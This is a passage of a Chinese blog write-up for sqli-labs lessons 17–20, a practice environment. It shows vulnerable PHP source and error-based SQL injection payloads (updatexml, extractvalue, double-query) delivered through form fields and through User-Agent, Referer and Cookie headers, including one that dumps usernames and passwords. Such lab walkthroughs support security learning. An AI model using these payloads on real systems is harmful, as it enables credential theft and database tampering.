<p>这样：发现可以了，但是<code>password</code>成了0，一下子把所有的用户密码都改成了0，后面的可能就有问题了。<code>&#39; or (select 1 from (select count(*),concat((select concat(username,&#39;: &#39;,password,&#39;;&#39;) from security.users limit 0,1),floor(rand()*2)) as x from security.users group by x) as a)#</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-c9450c04670427b9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>7.使用<code>extractvalue()</code>，和<code>updatexml()</code>十分相似，用法也差不多，甚至看起来跟直观些。构造：<code>&#39; and extractvalue(1,concat(&#39;~&#39;,(select version())))#</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-f35dd602fedb0c24.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>剩下的语句和<code>updatexml()</code>的类似。</p>
<hr>
<h3 id="Less-18"><a href="#Less-18" class="headerlink" title="Less-18"></a>Less-18</h3><p>1.进入后显示<code>Your IP ADDRESS is: ::1</code>，输入常用的注入尝试，都只显示：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-473c69a636b3b3dd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>看来和上一题一样，都进行了相关的过滤。<br>2.实在不懂，先看一下源码：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'uname'</span>]) &amp;&amp; <span class="keyword">isset</span>($_POST[<span class="string">'passwd'</span>]))</span><br><span class="line"></span><br><span class="line">	&#123;</span><br><span class="line">	$uname = check_input($_POST[<span class="string">'uname'</span>]);</span><br><span class="line">	$passwd = check_input($_POST[<span class="string">'passwd'</span>]);</span><br></pre></td></tr></table></figure></p>
<p>这次对两个表单都进行过滤了。<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">$sql=<span class="string">"SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1"</span>;</span><br><span class="line">	$result1 = mysql_query($sql);</span><br><span class="line">	$row1 = mysql_fetch_array($result1);</span><br><span class="line">		<span class="keyword">if</span>($row1)</span><br><span class="line">			&#123;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">'&lt;font color= "#FFFF00" font size = 3 &gt;'</span>;</span><br><span class="line">			$insert=<span class="string">"INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"</span>;</span><br><span class="line">			mysql_query($insert);</span><br><span class="line">			<span class="comment">//echo 'Your IP ADDRESS is: ' .$IP;</span></span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"&lt;/font&gt;"</span>;</span><br><span class="line">			<span class="comment">//echo "&lt;br&gt;";</span></span><br><span class="line">			<span class="keyword">echo</span> <span class="string">'&lt;font color= "#0000ff" font size = 3 &gt;'</span>;			</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">'Your User Agent is: '</span> .$uagent;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"&lt;/font&gt;"</span>;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">			print_r(mysql_error());			</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"&lt;br&gt;&lt;br&gt;"</span>;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">'&lt;img src="../images/flag.jpg"  /&gt;'</span>;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">			</span><br><span class="line">			&#125;</span><br><span class="line">		<span class="keyword">else</span></span><br><span class="line">			&#123;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">'&lt;font color= "#0000ff" font size="3"&gt;'</span>;</span><br><span class="line">			<span class="comment">//echo "Try again looser";</span></span><br><span class="line">			print_r(mysql_error());</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;			</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;"</span>;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">'&lt;img src="../images/slap.jpg"   /&gt;'</span>;	</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">"&lt;/font&gt;"</span>;  </span><br><span class="line">			&#125;</span><br></pre></td></tr></table></figure></p>
<p>看到只有用户再登陆成功后才会显示用户的<code>user agent</code>，并且将<code>uagent</code>, <code>ip_address</code>, <code>username</code>插入到了<code>uagents</code>表中。查看一下：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-ce8f72594aec13ca.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>注意到：<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$insert=<span class="string">"INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)"</span>;</span><br></pre></td></tr></table></figure></p>
<p>在插入过程中并没有进行过滤，由此可知，可以从<code>uagent</code>下手。本来<code>ip_address</code>也可以成功的，但是源码中显示被注释掉了，回显的只能是用户的<code>user agent</code><br>3.构造<code>uagent</code>的内容，使用<code>BurpSuite</code>对提交内容进行抓包，然后再修改相应的<code>User-Agent:</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-7a46990ba48068ef.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt><br>4.易知，只要保证<code>User-Agent:</code>字段内容，即<code>uagent</code>保持单引号闭合，且使用双查询注入或使用<code>extractvalue()</code>或<code>updatexml()</code>构造相应语句即可（因为是在插入语句中，只能通过报错获取我们想要的信息）。<br>5.构造语句查询数据库名：<br>构造一：<code>&#39; and updatexml(1,concat(&#39;~&#39;,(select database())),1) and &#39;1&#39;=&#39;1</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-8b4f0d3fd2f8d3c8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>构造二：<code>&#39; and extractvalue(1,concat(&#39;~&#39;,(select database()))) and &#39;1&#39;=&#39;1</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-028f8d52a66c6242.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>构造三：<code>&#39; and (select 1 from (select count(*),concat(database(),&#39;;&#39;,floor(rand()*2)) as x from information_schema.tables group by x)as a) and &#39;1&#39;=&#39;1</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-192483d02291c94d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>6.其他构造和之前的相似，不再赘述。</p>
<hr>
<h3 id="Less-19"><a href="#Less-19" class="headerlink" title="Less-19"></a>Less-19</h3><ol>
<li>提示为Referer，直接用我们知道的用户名密码都为：<code>admin</code>的进行尝试，发现：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-692b9e86aeacf041.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></li>
</ol>
<p>2.也就是说我们需要将构造语句放入<code>Referer:</code> 尝试：<code>&#39; and extractvalue(1,concat(&#39;~&#39;,(select database()))) and &#39;1&#39;=&#39;1</code><br><img src="https://upload-images.jianshu.io/upload_images/9216631-920c262677b58b4e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p><img src="https://upload-images.jianshu.io/upload_images/9216631-f0a421d41ea8f152.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>成功，知道方法就好了。</p>
<hr>
<h3 id="Less-20"><a href="#Less-20" class="headerlink" title="Less-20"></a>Less-20</h3><p>1.提示为Cookie，直接用我们知道的用户名密码都为：<code>admin</code>的进行尝试，发现：<br><img src="https://upload-images.jianshu.io/upload_images/9216631-c03dceb3e7e34884.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>2.<code>Cookie</code>为：<code>uname = admin</code> 所以构造：<code>uname=admin&#39; and extractvalue(1,concat(&#39;~&#39;,(select database()))) #</code></p>
<p><img src="https://upload-images.jianshu.io/upload_images/9216631-bc02821abe6a77e8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p><img src="https://upload-images.jianshu.io/upload_images/9216631-a0e86308216ed22c.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240" alt></p>
<p>3.构造还是一样的。</p>
<hr>
<p>目前就先到这吧，这部分的题目都是post类型的，后面好像还有，但还是放下一篇吧。当然，文中如有错误或其他更好的语句或解法，还希望诸位不吝赐教，多谢。</p>
<hr>
<h3 id="参考："><a href="#参考：" class="headerlink" title="参考："></a>参考：</h3><blockquote>
<ol>
<li><a href="https://blog.csdn.net/zpy1998zpy/article/details/80631036" target="_blank" rel="noopener">学习基于extractvalue()和updatexml()的报错注入</a></li>
<li><a href="https://bbs.pediy.com/thread-218235.htm" target="_blank" rel="noopener">SQL注入新手教程</a>(讲的很好的内容，之前没发现，现在才看到)</li>
<li><a href="http://beikeit.com/post-682.html" target="_blank" rel="noopener">It is not safe to rely on the  the system’s timezone settings解决方法</a></li>
</ol>
</blockquote>
<hr>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    lei
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="https://clwsec.top/2019/03/12/sqli-labs-Less11-20/" title="Sqli-Labs-Less11-20">https://clwsec.top/2019/03/12/sqli-labs-Less11-20/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/sqli-labs/" rel="tag"> <i class="fa fa-tag"></i> sqli-labs</a>
          
            <a href="/tags/SQL注入/" rel="tag"> <i class="fa fa-tag"></i> SQL注入</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/03/09/MySQL学习2/" rel="next" title="MySQL学习2">
                <i class="fa fa-chevron-left"></i> MySQL学习2
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2019/03/16/学习CTF/" rel="prev" title="学习CTF">
                学习CTF <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.gif" alt="lei">
            
              <p class="site-author-name" itemprop="name">lei</p>
              <p class="site-description motion-element" itemprop="description">业精于勤 荒于嬉 行成于思 毁于随</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">19</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-tags">
                <a href="/tags/index.html">
                  <span class="site-state-item-count">13</span>
                  <span class="site-state-item-name">标签</span>
                </a>
              </div>
            

          </nav>

          
            <div class="feed-link motion-element">
              <a href="/atom.xml" rel="alternate">
                <i class="fa fa-rss"></i>
                RSS
              </a>
            </div>
          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/clwsec" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="email:clwsec@163.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://www.jianshu.com/u/7e18a3f52ba3" target="_blank" title="简书">
                      
                        <i class="fa fa-fw fa-heartbeat"></i>简书</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="qq:740455490" target="_blank" title="QQ">
                      
                        <i class="fa fa-fw fa-qq"></i>QQ</a>
                  </span>
                
            </div>
          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-inline">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-globe"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.baidu.com/" title="百度" target="_blank">百度</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="https://www.zhihu.com/" title="知乎" target="_blank">知乎</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.w3school.com.cn/" title="W3school" target="_blank">W3school</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.runoob.com/" title="菜鸟" target="_blank">菜鸟</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-11"><span class="nav-number">1.</span> <span class="nav-text">Less-11</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#手工注入"><span class="nav-number">1.1.</span> <span class="nav-text">手工注入</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#用sqlmap注入"><span class="nav-number">1.2.</span> <span class="nav-text">用sqlmap注入</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-12"><span class="nav-number">2.</span> <span class="nav-text">Less-12</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-13"><span class="nav-number">3.</span> <span class="nav-text">Less-13</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-14"><span class="nav-number">4.</span> <span class="nav-text">Less-14</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-15"><span class="nav-number">5.</span> <span class="nav-text">Less-15</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-16"><span class="nav-number">6.</span> <span class="nav-text">Less-16</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-17"><span class="nav-number">7.</span> <span class="nav-text">Less-17</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-18"><span class="nav-number">8.</span> <span class="nav-text">Less-18</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-19"><span class="nav-number">9.</span> <span class="nav-text">Less-19</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Less-20"><span class="nav-number">10.</span> <span class="nav-text">Less-20</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#参考："><span class="nav-number">11.</span> <span class="nav-text">参考：</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
<div class="copyright">&copy; <span itemprop="copyrightYear">2019</span>
  <span class="with-love">
    <i class="fa fa-snowflake-o"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lei</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">34.5k</span>
  
</div>







        
<div class="busuanzi-count">
  <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
  
    <span class="site-uv">
      <i class="fa fa-user"></i> 访问人数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i> 访问总量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      
    </span>
  
</div>








        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  


  











  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  

  
  
    <script type="text/javascript" src="/lib/canvas-nest/canvas-nest.min.js"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  
  <script src="https://cdn1.lncld.net/static/js/av-core-mini-0.6.4.js"></script>
  <script>AV.initialize("G6dqnRdCxLa2gzB6qMGY7QCL-gzGzoHsz", "cEc5NtouoT5gS22x2xD9CUnO");</script>
  <script>
    function showTime(Counter) {
      var query = new AV.Query(Counter);
      var entries = [];
      var $visitors = $(".leancloud_visitors");

      $visitors.each(function () {
        entries.push( $(this).attr("id").trim() );
      });

      query.containedIn('url', entries);
      query.find()
        .done(function (results) {
          var COUNT_CONTAINER_REF = '.leancloud-visitors-count';

          if (results.length === 0) {
            $visitors.find(COUNT_CONTAINER_REF).text(0);
            return;
          }

          for (var i = 0; i < results.length; i++) {
            var item = results[i];
            var url = item.get('url');
            var time = item.get('time');
            var element = document.getElementById(url);

            $(element).find(COUNT_CONTAINER_REF).text(time);
          }
          for(var i = 0; i < entries.length; i++) {
            var url = entries[i];
            var element = document.getElementById(url);
            var countSpan = $(element).find(COUNT_CONTAINER_REF);
            if( countSpan.text() == '') {
              countSpan.text(0);
            }
          }
        })
        .fail(function (object, error) {
          console.log("Error: " + error.code + " " + error.message);
        });
    }

    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();
      var query = new AV.Query(Counter);

      query.equalTo("url", url);
      query.find({
        success: function(results) {
          if (results.length > 0) {
            var counter = results[0];
            counter.fetchWhenSave(true);
            counter.increment("time");
            counter.save(null, {
              success: function(counter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(counter.get('time'));
              },
              error: function(counter, error) {
                console.log('Failed to save Visitor num, with error message: ' + error.message);
              }
            });
          } else {
            var newcounter = new Counter();
            /* Set ACL */
            var acl = new AV.ACL();
            acl.setPublicReadAccess(true);
            acl.setPublicWriteAccess(true);
            newcounter.setACL(acl);
            /* End Set ACL */
            newcounter.set("title", title);
            newcounter.set("url", url);
            newcounter.set("time", 1);
            newcounter.save(null, {
              success: function(newcounter) {
                var $element = $(document.getElementById(url));
                $element.find('.leancloud-visitors-count').text(newcounter.get('time'));
              },
              error: function(newcounter, error) {
                console.log('Failed to create');
              }
            });
          }
        },
        error: function(error) {
          console.log('Error:' + error.code + " " + error.message);
        }
      });
    }

    $(function() {
      var Counter = AV.Object.extend("Counter");
      if ($('.leancloud_visitors').length == 1) {
        addCount(Counter);
      } else if ($('.post-title-link').length > 1) {
        showTime(Counter);
      }
    });
  </script>



  

  

  
  

  
  


  

  

</body>
</html>
